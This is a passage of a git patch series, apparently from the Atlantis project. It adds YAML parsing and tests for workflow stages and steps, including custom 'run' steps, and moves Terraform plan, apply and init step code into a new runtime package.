yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -412,7 +412,7 @@ projects: - dir: "." 
workflows: ~ `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, }, @@ -426,7 +426,7 @@ projects: workflows: default: ~ `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -463,7 +463,7 @@ workflows: plan: apply: `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -502,7 +502,7 @@ workflows: apply: steps: `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -534,7 +534,7 @@ workflows: - plan # we don't validate if they make sense - apply `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -586,7 +586,7 @@ workflows: - apply: extra_args: ["a", "b"] `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ @@ -634,7 +634,7 @@ workflows: steps: - run: echo apply "arg 2" `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go new file mode 100644 index 0000000000..7c84323b55 --- /dev/null +++ b/server/events/yaml/stage.go @@ -0,0 +1,5 @@ +package yaml + +type Stage struct { + Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' +} diff --git a/server/events/yaml/step_config.go b/server/events/yaml/step_config.go new file mode 100644 index 0000000000..f6e7713c0f --- /dev/null +++ b/server/events/yaml/step_config.go @@ -0,0 +1,82 @@ +package yaml + +import ( + "fmt" + + "github.com/flynn-archive/go-shlex" + "github.com/pkg/errors" +) + +type StepConfig struct { + StepType string + ExtraArgs []string + // Run will be 
set if the StepType is "run". This is for custom commands. + // Ex. if the key is `run: echo hi` then Run will be "echo hi". + Run []string +} + +func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + var singleString string + err := unmarshal(&singleString) + if err == nil { + if singleString != "init" && singleString != "plan" && singleString != "apply" { + return fmt.Errorf("unsupported step type: %q", singleString) + } + s.StepType = singleString + return nil + } + + // This represents a step with extra_args, ex: + // init: + // extra_args: [a, b] + var step map[string]map[string][]string + if err = unmarshal(&step); err == nil { + if len(step) != 1 { + return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") + } + + for k, v := range step { + if k != "init" && k != "plan" && k != "apply" { + return fmt.Errorf("unsupported step %q", k) + } + + extraArgs, ok := v["extra_args"] + if !ok { + return errors.New("the only supported key for a step is 'extra_args'") + } + + s.StepType = k + s.ExtraArgs = extraArgs + return nil + } + } + + // Try to unmarshal as a custom run step, ex. 
+ // steps: + // - run: my command + var runStep map[string]string + if err = unmarshal(&runStep); err == nil { + if len(runStep) != 1 { + return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") + } + + for k, v := range runStep { + if k != "run" { + return fmt.Errorf("unsupported step %q", k) + } + + s.StepType = "run" + parts, err := shlex.Split(v) + if err != nil { + return err + } + s.Run = parts + } + } + + return err +} diff --git a/server/events/yaml/step_config_test.go b/server/events/yaml/step_config_test.go new file mode 100644 index 0000000000..c75777ba53 --- /dev/null +++ b/server/events/yaml/step_config_test.go @@ -0,0 +1,159 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestStepConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.StepConfig + expErr string + }{ + + //Single string. + { + description: "should parse just init", + input: `init`, + exp: yaml.StepConfig{ + StepType: "init", + }, + }, + { + description: "should parse just plan", + input: `plan`, + exp: yaml.StepConfig{ + StepType: "plan", + }, + }, + { + description: "should parse just apply", + input: `apply`, + exp: yaml.StepConfig{ + StepType: "apply", + }, + }, + + // With extra_args. 
+ { + description: "should parse init with extra_args", + input: ` +init: + extra_args: [arg1, arg2]`, + exp: yaml.StepConfig{ + StepType: "init", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "should parse plan with extra_args", + input: ` +plan: + extra_args: [arg1, arg2]`, + exp: yaml.StepConfig{ + StepType: "plan", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "should parse apply with extra_args", + input: ` +apply: + extra_args: [arg1, arg2]`, + exp: yaml.StepConfig{ + StepType: "apply", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + + // extra_args with non-strings. + { + description: "should convert non-string extra_args into strings", + input: ` +init: + extra_args: [1]`, + exp: yaml.StepConfig{ + StepType: "init", + ExtraArgs: []string{"1"}, + }, + }, + { + description: "should convert non-string extra_args into strings", + input: ` +plan: + extra_args: [true]`, + exp: yaml.StepConfig{ + StepType: "plan", + ExtraArgs: []string{"true"}, + }, + }, + + // Custom run step. 
+ { + description: "should allow for custom run steps", + input: ` +run: echo my command`, + exp: yaml.StepConfig{ + StepType: "run", + Run: []string{"echo", "my", "command"}, + }, + }, + { + description: "should split words correctly in run step", + input: ` +run: echo 'my command'`, + exp: yaml.StepConfig{ + StepType: "run", + Run: []string{"echo", "my command"}, + }, + }, + + // Invalid steps + { + description: "should error when element is a map", + input: ` +key1: val +key2: val`, + expErr: "each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val", + }, + { + description: "should error when unrecognized step is used", + input: ` +invalid: val +`, + expErr: "unsupported step \"invalid\"", + }, + { + description: "should error when unrecognized step is used", + input: ` +invalid: + extra_args: [] +`, + expErr: "unsupported step \"invalid\"", + }, + { + description: "should error when unrecognized step is used", + input: ` +run: []`, + expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!seq into string", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var got yaml.StepConfig + err := yamlv2.Unmarshal([]byte(c.input), &got) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, got) + }) + } +} diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go new file mode 100644 index 0000000000..97055cb3da --- /dev/null +++ b/server/events/yaml/workflow.go @@ -0,0 +1,60 @@ +package yaml + +import "errors" + +type Workflow struct { + Apply *Stage `yaml:"apply"` // defaults to regular apply steps + Plan *Stage `yaml:"plan"` // defaults to regular plan steps +} + +func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Check if they forgot to set the "steps" key and just started listing + // steps, ex. 
+ // plan: + // - init + // - plan + type MissingSteps struct { + Apply []interface{} + Plan []interface{} + } + var missingSteps MissingSteps + // This will pass if they've just set the key to null, which we don't want + // since in that case we use the defaults to we also check if the len > 0. + if err := unmarshal(&missingSteps); err == nil && (len(missingSteps.Apply) > 0 || len(missingSteps.Plan) > 0) { + return errors.New("missing \"steps\" key") + } + + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Workflow + var tmp alias + if err := unmarshal(&tmp); err != nil { + return err + } + *p = Workflow(tmp) + + // If plan or apply keys aren't specified we use the default workflow. + if p.Apply == nil { + p.Apply = &Stage{ + []StepConfig{ + { + StepType: "apply", + }, + }, + } + } + + if p.Plan == nil { + p.Plan = &Stage{ + []StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + } + } + + return nil +} diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go new file mode 100644 index 0000000000..dd299799e4 --- /dev/null +++ b/server/events/yaml/workflow_test.go @@ -0,0 +1,123 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . 
"github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestWorkflow_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Workflow + expErr string + }{ + { + description: "should use defaults if set to null", + input: `~`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "apply", + }, + }, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + }, + }, + { + description: "should use set values", + input: ` +plan: + steps: + - plan +apply: + steps: [] +`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "plan", + }, + }, + }, + }, + }, + { + description: "should use defaults for apply if only plan set", + input: ` +plan: + steps: []`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "apply", + }, + }, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + }, + }, + { + description: "should use defaults for plan if only apply set", + input: ` +apply: + steps: []`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + }, + }, + { + description: "should error if no steps key specified", + input: ` +apply: +- apply`, + expErr: "missing \"steps\" key", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var w yaml.Workflow + err := yamlv2.Unmarshal([]byte(c.input), &w) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, w) + }) + } +} From d6883e83e4a0aa90113cfe85b6a8452ce8aae94e Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 8 Jun 2018 16:36:04 +0100 Subject: [PATCH 15/69] Move runtime elements to the runtime package --- 
server/events/apply_executor.go | 4 +- server/events/plan_executor.go | 4 +- server/events/project_locker_test.go | 42 ++-- server/events/{yaml => runtime}/apply_step.go | 2 +- .../{yaml => runtime}/apply_step_test.go | 16 +- .../{yaml => runtime}/execution_planner.go | 23 +- server/events/{yaml => runtime}/init_step.go | 2 +- .../{yaml => runtime}/init_step_test.go | 8 +- server/events/{yaml => runtime}/plan_step.go | 2 +- .../{yaml => runtime}/plan_step_test.go | 28 +-- server/events/{yaml => runtime}/repoconfig.go | 2 +- server/events/{yaml => runtime}/run_step.go | 2 +- server/events/runtime/run_step_test.go | 3 + server/events/runtime/runtime.go | 4 + .../yaml/{reader.go => parser_validator.go} | 31 ++- ...eader_test.go => parser_validator_test.go} | 208 ++---------------- server/events/yaml/project.go | 4 +- server/events/yaml/run_step_test.go | 3 - server/events/yaml/yaml.go | 4 + server/server.go | 5 +- 20 files changed, 120 insertions(+), 277 deletions(-) rename server/events/{yaml => runtime}/apply_step.go (97%) rename server/events/{yaml => runtime}/apply_step_test.go (90%) rename server/events/{yaml => runtime}/execution_planner.go (93%) rename server/events/{yaml => runtime}/init_step.go (98%) rename server/events/{yaml => runtime}/init_step_test.go (92%) rename server/events/{yaml => runtime}/plan_step.go (99%) rename server/events/{yaml => runtime}/plan_step_test.go (96%) rename server/events/{yaml => runtime}/repoconfig.go (99%) rename server/events/{yaml => runtime}/run_step.go (97%) create mode 100644 server/events/runtime/run_step_test.go create mode 100644 server/events/runtime/runtime.go rename server/events/yaml/{reader.go => parser_validator.go} (59%) rename server/events/yaml/{reader_test.go => parser_validator_test.go} (71%) delete mode 100644 server/events/yaml/run_step_test.go create mode 100644 server/events/yaml/yaml.go diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index 6562d8ab8e..dbacf35a64 100644 --- 
a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -16,10 +16,10 @@ package events import ( "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" - "github.com/runatlantis/atlantis/server/events/yaml" ) // ApplyExecutor handles executing terraform apply. @@ -31,7 +31,7 @@ type ApplyExecutor struct { AtlantisWorkspace AtlantisWorkspace ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender - ExecutionPlanner *yaml.ExecutionPlanner + ExecutionPlanner *runtime.ExecutionPlanner } // Execute executes apply for the ctx. diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index a620f2cb43..7e92917551 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -19,9 +19,9 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" - "github.com/runatlantis/atlantis/server/events/yaml" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator @@ -39,7 +39,7 @@ type PlanExecutor struct { Workspace AtlantisWorkspace ProjectFinder ProjectFinder ProjectLocker ProjectLocker - ExecutionPlanner *yaml.ExecutionPlanner + ExecutionPlanner *runtime.ExecutionPlanner LockURLGenerator LockURLGenerator } diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go index fd95503487..cd6c80d91a 100644 --- a/server/events/project_locker_test.go +++ 
b/server/events/project_locker_test.go @@ -55,8 +55,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) // // res := p.Execute(&ctx, "", project) // Equals(t, "err", res.ProjectResult.Error.Error()) @@ -68,8 +68,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ // PreInit: []string{"pre-init"}, // }, nil) // tfVersion, _ := version.NewVersion("0.9.0") @@ -86,8 +86,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) // tfVersion, _ := version.NewVersion("0.9.0") // When(tm.Version()).ThenReturn(tfVersion) // When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) @@ -102,8 +102,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// 
When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ // PreGet: []string{"pre-get"}, // }, nil) // tfVersion, _ := version.NewVersion("0.8") @@ -120,8 +120,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) // tfVersion, _ := version.NewVersion("0.8") // When(tm.Version()).ThenReturn(tfVersion) // When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) @@ -136,8 +136,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ // PrePlan: []string{"command"}, // }, nil) // tfVersion, _ := version.NewVersion("0.9") @@ -156,11 +156,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PreInit: []string{"pre-init"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.9") // When(tm.Version()).ThenReturn(tfVersion) // When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) @@ -182,11 +182,11 @@ package events_test 
// LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PreGet: []string{"pre-get"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.8") // When(tm.Version()).ThenReturn(tfVersion) // @@ -207,11 +207,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PrePlan: []string{"command"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.9") // When(tm.Version()).ThenReturn(tfVersion) // @@ -231,11 +231,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PreApply: []string{"command"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.9") // When(tm.Version()).ThenReturn(tfVersion) // @@ -262,7 +262,7 @@ package events_test // r := rmocks.NewMockRunner() // return &events.DefaultProjectLocker{ // Locker: l, -// ConfigReader: cr, +// ParserValidator: cr, // Terraform: tm, // Run: r, // }, l, tm, r diff --git a/server/events/yaml/apply_step.go b/server/events/runtime/apply_step.go similarity index 97% rename from server/events/yaml/apply_step.go rename to 
server/events/runtime/apply_step.go index 4b6a360612..3591414815 100644 --- a/server/events/yaml/apply_step.go +++ b/server/events/runtime/apply_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "fmt" diff --git a/server/events/yaml/apply_step_test.go b/server/events/runtime/apply_step_test.go similarity index 90% rename from server/events/yaml/apply_step_test.go rename to server/events/runtime/apply_step_test.go index f2066140e2..862f5e10e5 100644 --- a/server/events/yaml/apply_step_test.go +++ b/server/events/runtime/apply_step_test.go @@ -1,4 +1,4 @@ -package yaml_test +package runtime_test import ( "io/ioutil" @@ -9,14 +9,14 @@ import ( . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/events/yaml" . 
"github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := yaml.ApplyStep{ - Meta: yaml.StepMeta{ + s := runtime.ApplyStep{ + Meta: runtime.StepMeta{ Workspace: "workspace", AbsolutePath: "nonexistent/path", DirRelativeToRepoRoot: ".", @@ -33,8 +33,8 @@ func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - s := yaml.ApplyStep{ - Meta: yaml.StepMeta{ + s := runtime.ApplyStep{ + Meta: runtime.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", @@ -58,8 +58,8 @@ func TestRun_Success(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.11.4") - s := yaml.ApplyStep{ - Meta: yaml.StepMeta{ + s := runtime.ApplyStep{ + Meta: runtime.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", diff --git a/server/events/yaml/execution_planner.go b/server/events/runtime/execution_planner.go similarity index 93% rename from server/events/yaml/execution_planner.go rename to server/events/runtime/execution_planner.go index c349034004..012d6b008d 100644 --- a/server/events/yaml/execution_planner.go +++ b/server/events/runtime/execution_planner.go @@ -1,17 +1,23 @@ -package yaml +package runtime import ( "fmt" + "os" "path/filepath" "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" ) +const PlanStageName = "plan" +const ApplyStageName = "apply" +const AtlantisYAMLFilename = "atlantis.yaml" + type ExecutionPlanner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version - ConfigReader *Reader + ParserValidator *yaml.ParserValidator } type TerraformExec interface { @@ -30,17 +36,18 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str } func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs 
[]string, username string, defaults []Step) ([]Step, error) { - config, err := s.ConfigReader.ReadConfig(repoDir) - if err != nil { - return nil, err - } + config, err := s.ParserValidator.ReadConfig(repoDir) // If there's no config file, use defaults. - if config == nil { + if os.IsNotExist(err) { log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename) return defaults, nil } + if err != nil { + return nil, err + } + // Get this project's configuration. for _, p := range config.Projects { if p.Dir == relProjectPath && p.Workspace == workspace { @@ -61,7 +68,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) var steps []Step - var stepsConfig []StepConfig + var stepsConfig []yaml.StepConfig if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps } else { diff --git a/server/events/yaml/init_step.go b/server/events/runtime/init_step.go similarity index 98% rename from server/events/yaml/init_step.go rename to server/events/runtime/init_step.go index 235b90244e..1bf5b8734d 100644 --- a/server/events/yaml/init_step.go +++ b/server/events/runtime/init_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime // InitStep runs `terraform init`. type InitStep struct { diff --git a/server/events/yaml/init_step_test.go b/server/events/runtime/init_step_test.go similarity index 92% rename from server/events/yaml/init_step_test.go rename to server/events/runtime/init_step_test.go index bfdbd84b5f..911bcb2330 100644 --- a/server/events/yaml/init_step_test.go +++ b/server/events/runtime/init_step_test.go @@ -1,4 +1,4 @@ -package yaml_test +package runtime_test import ( "testing" @@ -7,8 +7,8 @@ import ( . 
"github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -43,8 +43,8 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := yaml.InitStep{ - Meta: yaml.StepMeta{ + s := runtime.InitStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", diff --git a/server/events/yaml/plan_step.go b/server/events/runtime/plan_step.go similarity index 99% rename from server/events/yaml/plan_step.go rename to server/events/runtime/plan_step.go index 99890e62ea..b8d6b3acee 100644 --- a/server/events/yaml/plan_step.go +++ b/server/events/runtime/plan_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "fmt" diff --git a/server/events/yaml/plan_step_test.go b/server/events/runtime/plan_step_test.go similarity index 96% rename from server/events/yaml/plan_step_test.go rename to server/events/runtime/plan_step_test.go index 91e9372d37..53b45c2e64 100644 --- a/server/events/yaml/plan_step_test.go +++ b/server/events/runtime/plan_step_test.go @@ -1,4 +1,4 @@ -package yaml_test +package runtime_test import ( "errors" @@ -11,8 +11,8 @@ import ( . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . 
"github.com/runatlantis/atlantis/testing" ) @@ -25,8 +25,8 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -61,8 +61,8 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -112,8 +112,8 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -170,8 +170,8 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -212,8 +212,8 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -258,8 +258,8 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. 
tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: tmpDir, diff --git a/server/events/yaml/repoconfig.go b/server/events/runtime/repoconfig.go similarity index 99% rename from server/events/yaml/repoconfig.go rename to server/events/runtime/repoconfig.go index 7af982436b..138f73f0db 100644 --- a/server/events/yaml/repoconfig.go +++ b/server/events/runtime/repoconfig.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "github.com/hashicorp/go-version" diff --git a/server/events/yaml/run_step.go b/server/events/runtime/run_step.go similarity index 97% rename from server/events/yaml/run_step.go rename to server/events/runtime/run_step.go index e4794a22ce..ba6dbe3859 100644 --- a/server/events/yaml/run_step.go +++ b/server/events/runtime/run_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "fmt" diff --git a/server/events/runtime/run_step_test.go b/server/events/runtime/run_step_test.go new file mode 100644 index 0000000000..899327a695 --- /dev/null +++ b/server/events/runtime/run_step_test.go @@ -0,0 +1,3 @@ +package runtime_test + +// todo diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go new file mode 100644 index 0000000000..ea70550a68 --- /dev/null +++ b/server/events/runtime/runtime.go @@ -0,0 +1,4 @@ +// Package runtime handles constructing an execution graph for each action +// based on configuration and defaults. The handlers can then execute this +// graph. 
